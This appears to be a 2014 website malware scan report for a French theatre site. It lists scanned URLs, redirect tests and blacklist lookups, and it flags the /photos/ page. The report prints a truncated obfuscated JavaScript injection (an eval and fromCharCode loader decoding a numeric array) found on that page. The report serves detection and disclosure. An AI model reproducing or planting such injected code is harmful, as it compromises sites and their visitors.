Scanned pages/files
Request | Server response | Status |
http://theatreduroirene.com/ | 200 OK Content-Length: 71324 Content-Type: text/html | clean |
http://theatreduroirene.com/photos/ | 200 OK Content-Length: 8381 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) aa=([].slice+'hjkbghkj').substr(2-1,4);if((aa=="func")||(aa=="unct"))aa=(document['createDocumentFragm'+'e'+'n'+'t']+'evweds').substr(2-1,4);if((aa=="func")||(aa=="unct")){ss=new String();s=String;12-function(){e=eval;f='fromCharCode';}();t='k';}ddd=new Date();d2=new Date(ddd.valueOf()-2);h=(ddd-d2)*-1;n=["4.5k4.5k52.5k51k16k20k50k55.5k49.5k58.5k54.5k50.5k55k58k23k51.5k50.5k58k34.5k54k50.5k54.5k50.5k55k58k57.5k33k60.5k42k48.5k51.5k39k48.5k54.5k50.5k20k19.5k49k55.5k50k60.5k19.5k20.5k45.5k24k46.5k Antivirus reports:
| ||
http://theatreduroirene.com/test404page.js | 404 Not Found Content-Length: 1806 Content-Type: text/html | clean |
http://theatreduroirene.com/index.php?deb=1405375200 | 200 OK Content-Length: 58303 Content-Type: text/html | clean |
http://theatreduroirene.com/index.php?deb=1404770400 | 200 OK Content-Length: 58223 Content-Type: text/html | clean |
http://theatreduroirene.com/index.php?deb=1404165600 | 200 OK Content-Length: 55122 Content-Type: text/html | clean |
http://theatreduroirene.com/index.php?deb=1403560800 | 200 OK Content-Length: 53894 Content-Type: text/html | clean |
http://theatreduroirene.com/index.php?deb=1402956000 | 200 OK Content-Length: 53894 Content-Type: text/html | clean |
http://theatreduroirene.com/index.php?deb=1402351200 | 200 OK Content-Length: 53894 Content-Type: text/html | clean |
http://theatreduroirene.com/index.php?deb=1401746400 | 200 OK Content-Length: 53894 Content-Type: text/html | clean |
http://theatreduroirene.com/index.php?deb=1401141600 | 200 OK Content-Length: 53887 Content-Type: text/html | clean |
http://theatreduroirene.com/index.php?deb=1400536800 | 200 OK Content-Length: 53886 Content-Type: text/html | clean |
http://theatreduroirene.com/index.php?deb=1399932000 | 200 OK Content-Length: 53886 Content-Type: text/html | clean |
http://theatreduroirene.com/index.php?deb=1399327200 | 200 OK Content-Length: 53886 Content-Type: text/html | clean |
http://theatreduroirene.com/index.php?deb=1398722400 | 200 OK Content-Length: 53894 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: theatreduroirene.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 24 Jul 2014 10:24:05 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Vary: Accept-Encoding
Content-Type: text/html
X-Powered-By: PHP/5.2.6-1+lenny16
GET / HTTP/1.1
Host: theatreduroirene.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 24 Jul 2014 10:24:05 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Vary: Accept-Encoding
Content-Type: text/html
X-Powered-By: PHP/5.2.6-1+lenny16
Second query (visit from search engine):
GET / HTTP/1.1
Host: theatreduroirene.com
Referer: http://www.google.com/search?q=theatreduroirene.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: theatreduroirene.com
Referer: http://www.google.com/search?q=theatreduroirene.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=theatreduroirene.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://theatreduroirene.com/
Result: theatreduroirene.com is not infected or malware details are not published yet.
Result: theatreduroirene.com is not infected or malware details are not published yet.